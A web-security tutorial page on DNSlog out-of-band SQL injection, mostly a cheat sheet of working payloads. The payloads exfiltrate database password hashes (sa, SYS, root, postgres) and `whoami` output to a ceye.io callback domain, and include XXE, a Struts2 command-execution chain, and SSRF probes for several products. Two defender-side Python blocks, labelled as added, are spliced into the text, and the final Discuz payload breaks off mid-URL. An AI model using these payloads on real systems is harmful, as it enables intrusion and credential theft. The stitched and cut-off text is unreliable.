WEB Security: DNSlog SQL injection

Solemnly declare:
This note is prepared solely to improve security knowledge and to share it with more people. Do not use the techniques in this note for illegal activities. The author bears no responsibility for any consequences caused by using the techniques in this note. We advocate that everyone take responsibility for maintaining network security and jointly safeguard a civil and harmonious network.

1 Principle

  • DNSlog is the domain-name resolution log kept on a DNS server: it records which names were queried by a client, and when. Because the authoritative server for a domain sees every lookup of that domain's subdomains, reading the resolution log of a multi-level domain name recovers whatever information was embedded in those names.
  • The injected query statement initiates a DNS query: the value selected by the query is concatenated into a third-level domain name, the resulting name is resolved, and it appears in the DNS log of that domain's NS server.
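As an added defender-side example (not part of the original note, and not CEYE's code): a small Python detector that reads DNS query-log lines in a BIND-style format (an assumption about the log source) and flags names that look like DNSlog exfiltration, i.e. queries under a known out-of-band callback domain such as ceye.io, hex-encoded or long high-entropy labels (the shape produced by the fn_varbintohexstr payload above), and unusually deep names. The log lines are constructed; client and answer addresses use documentation ranges.

```python
import math
import re

# Constructed sample lines in BIND-style query-log format; they are not
# from the note, and the addresses are documentation ranges.
SAMPLE_LOG = """\
29-Jan-2022 07:18:40.101 client 203.0.113.5#53211 (www.example.org): query: www.example.org IN A + (192.0.2.1)
29-Jan-2022 07:18:41.220 client 203.0.113.5#53212 (0x0200a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8.ip.port.b182oj.ceye.io): query: 0x0200a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8.ip.port.b182oj.ceye.io IN A + (192.0.2.1)
29-Jan-2022 07:18:42.330 client 203.0.113.7#53213 (5.7.31-log.abc123.ceye.io): query: 5.7.31-log.abc123.ceye.io IN A + (192.0.2.1)
29-Jan-2022 07:18:43.440 client 203.0.113.9#53214 (mail.example.org): query: mail.example.org IN MX + (192.0.2.1)
"""

# Out-of-band interaction domains that appear in the note's payloads.
OOB_DOMAINS = ("ceye.io",)

LINE_RE = re.compile(
    r"client (?P<client>[\d.:a-fA-F]+)#\d+ .*?query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)
# A label made of 16+ hex digits, optionally with a 0x prefix.
HEX_LABEL_RE = re.compile(r"^(0x)?[0-9a-fA-F]{16,}$")


def parse_query_log(text):
    """Extract (client, qname, qtype) from every line that is a query record."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            qname = m.group("qname").rstrip(".").lower()
            records.append((m.group("client"), qname, m.group("qtype")))
    return records


def shannon_entropy(s):
    """Bits of entropy per character; exfiltrated data tends to score high."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_reasons(qname, oob_domains=OOB_DOMAINS):
    """Return the reasons a name looks like DNS exfiltration (empty list if none)."""
    reasons = []
    labels = qname.split(".")
    if any(qname == d or qname.endswith("." + d) for d in oob_domains):
        reasons.append("known out-of-band callback domain")
    # Everything left of the registered domain is whatever the requester put there.
    payload = labels[:-2]
    for label in payload:
        if HEX_LABEL_RE.match(label):
            reasons.append("hex-encoded label: %s" % label)
        elif len(label) > 30 and shannon_entropy(label) > 3.5:
            reasons.append("long high-entropy label: %s" % label)
    if len(payload) >= 4:
        reasons.append("unusually deep name (%d labels)" % len(labels))
    return reasons


def analyze(text):
    """Map each suspicious query name to its reasons; benign names are omitted."""
    findings = {}
    for _client, qname, _qtype in parse_query_log(text):
        reasons = suspicious_reasons(qname)
        if reasons:
            findings[qname] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in analyze(SAMPLE_LOG).items():
        print(name, "->", "; ".join(reasons))
```

The callback-domain list is the highest-signal check and should be maintained from the DNSlog platforms seen in your environment; the label heuristics catch the same technique on a domain you have not seen before, at the cost of some false positives on CDN-style names, so tune the length and entropy thresholds against your own logs.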

2 Utilization scenario

  • The web application has a SQL injection vulnerability but the page does not echo query results, so when reading files, executing commands or performing similar operations it is impossible to confirm whether the injection succeeded.
  • Blind injection by bisection (Boolean-based and time-based blind injection) is slow and needs many threads, so it is easily intercepted or even blocked by a WAF.
  • In that case DNSlog injection carries the requested content out in a DNS query, and the desired result is obtained by consulting the DNSlog.

3 Preconditions

  • A DNSlog server is available
  • The target host can access the Internet
  • The database user has file read/write permission
  • UNION queries can be used
  • The absolute path of the file to read is known
    (1) Query the user's file permissions

4 Platform

5 Payloads

Payload examples from the CEYE website

Use of the CEYE platform (more detailed examples)

0x00 Command execution

i. *nix

curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io

ii. Windows

ping %USERNAME%.b182oj.ceye.io

0x01 SQL Injection

i. SQL Server

DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1 master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa')+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');

Example:
# Query the MSSQL sa password
;DECLARE @host varchar(1024);SELECT @host=(SELECT TOP 1 password from admin)+'.YourIdentifier.ceye.io';EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');

http://mssql.lab.com/index.aspx?id=1%3b%44%45%43%4c%41%52%45%20%40%68%6f%73%74%20%76%61%72%63%68%61%72%28%31%30%32%34%29%3b%53%45%4c%45%43%54%20%40%68%6f%73%74%3d%28%53%45%4c%45%43%54%20%54%4f%50%20%31%20%70%61%73%73%77%6f%72%64%20%66%72%6f%6d%20%61%64%6d%69%6e%29%2b%27%2e%36%68%63%6a%64%39%2e%63%65%79%65%2e%69%6f%27%3b%45%58%45%43%28%27%6d%61%73%74%65%72%2e%2e%78%70%5f%64%69%72%74%72%65%65%22%5c%5c%27%2b%40%68%6f%73%74%2b%27%5c%66%6f%6f%62%61%72%24%22%27%29%3b

ii. Oracle

SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;

iii. MySQL

  • MySQL 5.7.6 introduced secure_file_priv, which confines LOAD DATA, SELECT ... INTO OUTFILE and LOAD_FILE() to a specified directory.
  • show variables like '%secure%'; shows whether LOAD_FILE() can read from disk.
  • The value of secure_file_priv cannot be changed dynamically; it can only be modified in the MySQL configuration file and takes effect after a restart.
    • NULL: the default; MySQL is restricted and import/export are not allowed.
    • /dir/: MySQL import/export are restricted and can only take place under the /dir/ directory.
    • Empty string (''): MySQL import/export are not restricted.
  • The property can also be viewed with the command
    • select @@secure_file_priv
  • In a MySQL + PHP architecture, the magic_quotes_gpc setting in PHP's configuration file php.ini also affects writing files:
    • gpc on: special characters are escaped (for example ' becomes \'), so the input is escaped before it reaches the query.

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));

Example:
# Query the database version
http://mysql.lab.com/index.php?id=1 and (select load_file(concat('\\\\',(select version()),'.YourIdentifier.ceye.io\\abc')))
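The MySQL preconditions above (secure_file_priv not NULL, and an account holding the FILE privilege) can be turned into a quick hardening check. The following Python is an added example, not from the note or from CEYE; it takes the results of `SELECT @@secure_file_priv` and `SHOW GRANTS FOR CURRENT_USER()` as already-fetched values (constructed here so that it runs without a server) and reports whether LOAD_FILE() is usable at all and what to fix.

```python
import re

# Constructed values standing in for what the two checks would return;
# they are not real server output.
SECURE_FILE_PRIV_UNRESTRICTED = ""             # empty string: no restriction
SECURE_FILE_PRIV_DISABLED = None               # NULL: import/export disabled
SECURE_FILE_PRIV_DIR = "/var/lib/mysql-files/"  # confined to one directory
GRANTS_BROAD = ["GRANT ALL PRIVILEGES ON *.* TO 'webapp'@'%'"]
GRANTS_LEAST = ["GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO 'webapp'@'localhost'"]

# One SHOW GRANTS row: privilege list, scope (db.table), grantee.
GRANT_RE = re.compile(r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO ", re.IGNORECASE)


def classify_secure_file_priv(value):
    """Map the variable's value to the three states the note describes."""
    if value is None:
        return "disabled"
    if value == "":
        return "unrestricted"
    return "restricted to " + value


def has_file_privilege(grants):
    """FILE is a global privilege, so only *.* grants can confer it (directly or via ALL)."""
    for line in grants:
        m = GRANT_RE.match(line.strip())
        if not m or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if "FILE" in privs or "ALL PRIVILEGES" in privs or "ALL" in privs:
            return True
    return False


def assess(secure_file_priv, grants):
    """Return findings; LOAD_FILE() needs both FILE and a non-NULL secure_file_priv."""
    state = classify_secure_file_priv(secure_file_priv)
    file_priv = has_file_privilege(grants)
    findings = []
    if state == "unrestricted":
        findings.append("secure_file_priv is empty: LOAD_FILE/OUTFILE may touch any path the server process can")
    elif state.startswith("restricted"):
        findings.append("secure_file_priv limits file operations to " + secure_file_priv)
    if file_priv:
        findings.append("application account holds FILE (or ALL) on *.*; revoke it")
    return {
        "secure_file_priv": state,
        "file_privilege": file_priv,
        "load_file_usable": file_priv and state != "disabled",
        "findings": findings,
    }


if __name__ == "__main__":
    for label, args in (("weak", (SECURE_FILE_PRIV_UNRESTRICTED, GRANTS_BROAD)),
                        ("hardened", (SECURE_FILE_PRIV_DISABLED, GRANTS_LEAST))):
        print(label, assess(*args))
```

Setting secure_file_priv to NULL in the configuration file (the note is right that it cannot be changed at runtime) and revoking FILE from the application account closes the LOAD_FILE() path; restricting outbound DNS from the database host removes the DNSlog channel itself, which also covers the other database engines listed here.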

iv. PostgreSQL

DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE
  exec_cmd TEXT;
  query_result TEXT;
BEGIN
  SELECT INTO query_result (SELECT passwd FROM pg_shadow WHERE usename='postgres');
  exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';
  EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();

0x02 XML Entity Injection

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>

0x03 Others

i. Struts2

xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}
xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}

ii. FFMpeg

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://ip.port.b182oj.ceye.io
#EXT-X-ENDLIST

iii. Weblogic

 xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search

iv. ImageMagick

push graphic-context
viewbox 0 0 640 480
fill 'url(http://ip.port.b182oj.ceye.io)'
pop graphic-context

v. Resin

xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf

vi. Discuz

http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http:/

Keywords: Database security metasploit

Added by astaroth on Sat, 29 Jan 2022 07:18:40 +0200